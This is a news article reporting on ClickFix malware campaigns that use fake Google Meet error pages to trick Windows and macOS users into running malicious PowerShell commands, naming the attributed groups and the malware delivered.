In a new wave of Clickfix campaigns, scammers are targeting users on fake Google Meet pages, tricking them into believing they have compound errors in order to spread malicious software capable of infecting both Windows and MacOS systems.
The Clickfix tactic first came to light in May, when cybersecurity company Proofpoint reported its use by the TA571 group. Initial attacks involved fake errors in Google Chrome, Microsoft Word, and OneDrive, prompting victims to input a code into the PowerShell command line to rectify the issues, unwittingly leading to device infections.
Malicious programs such as DarkGate, Matanbuchus, Netsuport, Amadey Loader, Xmrig, and Lumma Stealer have been spread through this method. In July, McAfee highlighted an increase in the frequency of these attacks, particularly in the USA and Japan.
Recent reports show a shift in Clickfix tactics, with attackers now using fake Google Meet invitations and phishing emails targeting transport and logistics companies. New strategies include fake Facebook pages and GitHub discussions to deceive victims.
Sekoia has linked these recent campaigns to two groups – Slavic Nation Empire (SNE) and Scamquerteo, allegedly affiliated with cryptocurrency fraud groups Marko Polo and Cryptolove.
Attacks via Google Meet appear convincing, with scammers sending emails containing fake links resembling official Google Meet domains. Once users visit these pages, they receive false error messages related to microphone or headphone issues. An attempt to “fix” the error triggers the malicious Clickfix script, executing a PowerShell command line that downloads malware from the “Googiedrivers[.]com” domain.
Windows systems are loaded with Stealc or Rhadamanthys, while MacOS devices receive AmoS Stealer in .dmg format named “Launcher_V194.” In addition to Google Meet, attackers are also utilizing other platforms like Zoom, fake PDF readers, counterfeit video games, and Web3 projects to distribute malware.